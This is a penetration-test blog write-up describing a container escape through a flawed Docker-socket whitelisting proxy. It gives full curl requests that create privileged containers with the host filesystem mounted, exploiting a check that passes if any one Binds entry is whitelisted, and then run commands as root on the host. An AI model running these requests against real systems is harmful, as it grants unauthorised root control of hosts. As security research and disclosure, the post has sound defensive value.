A Tale of Escaping a Hardened Docker container

Legend has it that before his death, Harry Houdini once said: “if it is truly possible for someone to return from the afterlife, I will”. Despite of the fact he was a great illusionist and escape artist, it seems this last proof has revealed to be very hard, even for him. Much simpler trying to escape out of a container. Of course a docker container 🙂 … our topic for today.

The danger of exposing “docker.sock” to a docker container is well-known and the security literature is full of examples (one is here) leading to container escape and privilege escalation issues in the host machine. But sometimes this is required (if not even necessary) for legitimate purposes, like creating other containers or pushing configuration settings. While the docker security guidelines advocate to not share the Docker UNIX socket inside a container, at the same time the project developers do not give any advice on how to secure such a kind of configuration whenever it is needed for “good reasons”. And that’s why so many companies that adopt docker and deliver services based on it, still today, suffer from this problem.

For example, last year a customer of us has contracted a security firm to check the robustness of their docker infrastructure. One of their main findings was the file “docker.sock” being mounted within some of their containers, which of course was a sufficient condition to compromise the entire host operating system. In the absence of a strong solution coming from the community, our customer has decided to build its own solution. They created a reverse proxy in front of the Docker UNIX socket file that would add authentication/authorization, and would prevent insecure utilization of the Docker socket itself.

Then they asked us to test the new architecture. This is the story of how the sympathetic Red Timmy has managed to bypass it.

The architecture

Before moving forward, we must explain a bit the implementation we have been called to test and a picture should make the job easy enough.

In this architecture there are two UNIX socket files now:

  • /var/run/docker.sock is not exposed within the docker containers anymore. It is readable and writable only for the “root” user and the “docker” group. As you already know the docker engine uses it directly.
  • /var/run/somethingelse.sock is instead the resource exposed within the docker containers. The file is created in order to be readable and writable only by an unprivileged user which is not part of the docker group. In this way the process creating it does not own enough access rights to read and write directly into “/var/run/docker.sock”. The docker engine remains the only one able to do that.

Then a reverse proxy, running as a privileged user, sits in the middle of these two UNIX socket files. It fetches requests from “/var/run/somethingelse.sock” and determines whether or not these must be forwarded to “/var/run/docker.sock” based on a whitelist of authorized values preemptively saved in a configuration file. For example, a request could be let pass through only if it matches a specific HTTP method (GET, POST, etc…), path (for example “/containers/create”) and/or JSON body.

At the same way the reverse proxy returns the replies from “docker.sock” to “somethingelse.sock” once they are in the pipeline. At first glance the workflow looked fine and flawless.

Let the dance begin

Ok, all clear. We have been provided with access to a docker container:

[root@dockerhost ~]# docker exec -it 7c4e2742becb bash
bash-4.4$
<-- container command prompt

Also our handsome UNIX socket file is where it is supposed to be:

bash-4.4$ ls –al /var/run/somethingelse.sock
srw------- 1 unpriv root 0 Feb 13 11:31 somethingelse.sock

Now we must find a way to escape out of there. First thing we try is to leverage the “old” trick as documented in the report that our customer has received from the security firm they had originally contracted:

bash-4.4$ curl –i –s –-unix-socket /var/run/somethingelse.sock –X POST –H ‘Content-Type: application/json’ –data-binary ‘{"Hostname": "","Domainname": "","User": "","AttachStdin": true, "AttachStdout": true, "AttachStderr": true, "Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash”,”Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos"], "Privileged": true}}’ http://localhost/containers/create

The main difference in our command is that instead of establishing a communication channel with “/var/run/docker.sock” (not mounted in the container) we target “/var/run/somethingelse.sock” (which is instead mounted in the container). All the hacking steps are performed with curl. Specifically, as we are communicating with a UNIX domain socket, the “--unix-socket <filename>” option is adopted.

The command above is the same (a bit extended) as specified in the section “Create the container with the mounted volumeof this online tutorial, which the penetration tester had linked into his report. I strongly suggest you to read that post before going ahead with this one, if you are not familiar with the technique in general. Anyway, even if you are not familiar, below follows a short explanation of what we were trying to do with that command.

Basically, from inside the container we are in, we are trying to create another container that, once started, will have the root directory “/”of the host operating system mounted under its “/hostos/” folder. If that can be done, it is game over. Just connecting to the new container and launching the command “chroot /hostos” would provide the attacker with full access to the host operating system and all its files.

In our case instead the reverse proxy replied with:

HTTP/1.1 403 Forbidden

Honestly it was expected. Something else had to be attempted.

Time for circumvention

After a bit of trial and error we understand that the stricter check is performed on the value passed to “Binds”. When we provide the string “/:/hostos” trying to map the filesystem “/” of the host into the “/hostos” directory of the container, the request is rejected because the specified string is not in the whitelist. However we discovered, for example, that “/dev/log:/dev/log” is an accepted value instead. It means the reverse proxy allows us to create a container from inside another container when that value is provided. Of course there is nothing special with using “/dev/log” to bypass the filter. But what if the strings “/:/hostos” and “/dev/log:/dev/log” are both specified as part of the same “Binds” parameter, like below?

bash-4.4$ curl –i –s –-unix-socket /var/run/somethingelse.sock –X POST –H ‘Content-Type: application/json’ –data-binary ‘{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"], "Privileged": true}}’ http://localhost/containers/create

Unexpectedly, the reverse proxy replies with:

HTTP/1.1 201 Created
Api-Version: 1.39
Content-Length: 90
Content-Type: application/json
Date: Fri, 15 May 2020 08:19:58 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)

{"Id":"4fa6bfc84930[...]","Warnings":null}

So it means we are allowed to create a new container where the root of the host filesystem is mounted into its “/hostos” directory. To confirm that, we manually started the newly created container from the host OS and then accessed it. This was what we got…

[root@4fa6bfc84930 opt]# ls -al /hostos/
[...]
drwxr-xr-x. 102 root root 8192 May 6 09:08 etc
drwxr-xr-x. 6 root root 56 Feb 7 2018 home
drwxr-xr-x. 2 root root 6 Mar 10 2016 media
drwxr-xr-x. 2 root root 6 Mar 10 2016 mnt
drwxr-xr-x. 17 root root 4096 Mar 24 2017 nfs
drwxr-xr-x. 7 root root 106 Jan 7 2019 opt
dr-xr-xr-x. 375 root root 0 Nov 23 08:23 proc
dr-xr-x---. 8 root root 4096 May 14 13:51 root
drwxr-xr-x. 35 root root 1140 May 6 09:08 run
lrwxrwxrwx. 1 root root 8 Jan 18 2018 sbin -> usr/sbin
[...]

…meaning that from inside the container we have total control over the entire host OS filesystem, which is what the reverse proxy implementation was attempting to prevent. Good, but how was that possible? Well, let’s have a look once more at the interested part that made the trick possible:

"Binds": ["/:/hostos", "/dev/log:/dev/log"]

It seems that in case just one of the strings given to the “Binds” parameter is present in the whitelist, the whole check is considered passed, regardless of the presence of other values that are instead not defined in the whitelist configuration. The logic of the reverse proxy was clearly flawed.

Start the container just created

So from inside the current container we have managed to create a new one with full access to the host OS filesystem. But we have not executed anything in the host OS yet…and we are still confined within our unprivileged container.

bash-4.4$

Let’s try to get out of here. First of all let’s see if after its creation we can also start the container from the place where we are now:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' http://localhost/containers/4fa6bfc84930[...]/start

As indicated in the Docker API the endpoint to target this time is “/containers/{ID}/start”, where ID (in bold above) is the value the reverse proxy has returned to us with the previous request. The reply we get is:

HTTP/1.1 204 No Content
Api-Version: 1.39
Date: Fri, 15 May 2020 08:20:34 GMT
Docker-Experimental: false
Ostype: linux
Server: Docker/18.09.11 (linux)

It means we are allowed to do that. So far, so good. Now the high privileged container is started and we want to execute a command in there. We could for example create an exec instance and then start it to get the result back. Unfortunately the reverse proxy did not let us pass through, because the endpoint “/containers/{id}/exec”  is not in the whitelist:

HTTP/1.1 403 Forbidden

Ok, what if with the docker API we attach to the created privileged container to send it input and read the output directly from the unprivileged one where we are confined now?

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST “http://localhost/containers/4fa6bfc84930/attach?logs=1&stream=1&stdin=true&stdout=true&stderr=true”

In this case the reply is encouraging…

HTTP/1.1 200 OK
Content-Type: application/vnd.docker.raw-stream
Date: Thu, 14 May 2020 16:05:09 GMT
Transfer-Encoding: chunked

…but for some reason we are returned back to the shell of our unprivileged container:

bash-4.4$

Probably the reverse proxy do not handle well such a kind of requests even though not explicitly prohibited in the whitelist configuration file. We clearly cannot abuse this mechanism.

Searching for something else

What other options are we left with in order to execute a command in the started container? Unfortunately not many and everything we tried was blocked or did not work. Let’s analyze what we are allowed to do so far. The best achievement is the ability to bypass the reverse proxy’s whitelist and create a container. We decided then to take a better look at the Docker API and stumbled upon the parameter “Cmd” of the “/containers/create” endpoint.

This looks like a command run when the container is started. We decided to give it a try by creating a new container specifying that parameter:

curl –i –s –-unix-socket /var/run/somethingelse.sock –X POST –H ‘Content-Type: application/json’ –data-binary ‘{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint":"","Cmd": "touch /hostos/root/marco_RT_was_here.txt","Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"], "Privileged": true}}’ http://localhost/containers/create

Compared to the previous launched command:

  • Entrypoint” is now empty as we don’t need it.
  • Cmd” is set to the command we want to execute in the host OS, that is “touch /hostos/root/marco_RT_was_here.txt
  • Binds” is configured the same way as the previous request in order to mount the root of the host OS into the “/hostos” directory of the new created container.

As “/hostos” is containing the full host filesystem due to the whitelist bypass of the “Binds” parameter seen before, the assumption is that this request will actually create the file named “marco_RT_was_here.txt” into the “/root” folder with the permissions of the root user, once the container is started.

After submitting our request, the reverse proxy replies with the ID of the new container (abac34acc1003[...]). Time to start it:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' http://localhost/containers/abac34acc1003[...]/start

We would have expected to see the file “marco_RT_was_here.txt” created inside the “/root” folder of the host OS. Instead we were wrong. However, a quick look at the description of the “Cmd” parameter was sufficient to reveal that the command must be passed as an “Array of string”. Which means our payload has to be shaped like this:

["touch", "/hostos/root/marco_RT_was_here.txt"]

…and not as a single static string “touch /hostos/root/marco_RT_was_here.txt”. Ok, let’s send the request again:

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' --data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true, "Tty": true,"OpenStdin": true, "StdinOnce": true,"Entrypoint": "","Cmd": ["touch", "/hostos/root/marco_RT_was_here.txt"],"Image": "dockerint.company.com/xxx/imagename:1.0.0-SNAPSHOT","Volumes": {"/hostos/": {}}, "HostConfig": {"Binds": ["/:/hostos", "/dev/log:/dev/log"], "Privileged": true}}' http://localhost/containers/create

The ID the reverse proxy returns is 21429c9550c5c. Then, with that ID in our hands, the container is started for the umpteenth time…

curl -i -s --unix-socket /var/run/somethingelse.sock -X POST -H 'Content-Type: application/json' http://localhost/containers/21429c9550c5c[...]/start

…and now things seem to work, as shown in the picture below:

# ls -al /root/
[...]
-rw-r--r-- 1 root root 0 May 15 10:20 marco_RT_was_here.txt
[...]

This incontrovertibly demonstrates that the filesystem of the host machine is fully accessible from the container we are confined in, and that we can write files on the host OS as root. This can then be taken further in ways only limited by our imagination. From the host OS we could for example write a cronjob, launch a reverse shell, deploy a malicious privileged docker image with ssh port exposed, etc…

Wonderful! This terminates our post. Do not forget to follow us on twitter, github and above all have a look at the Red Timmy Academy page to get our last courses and trainings.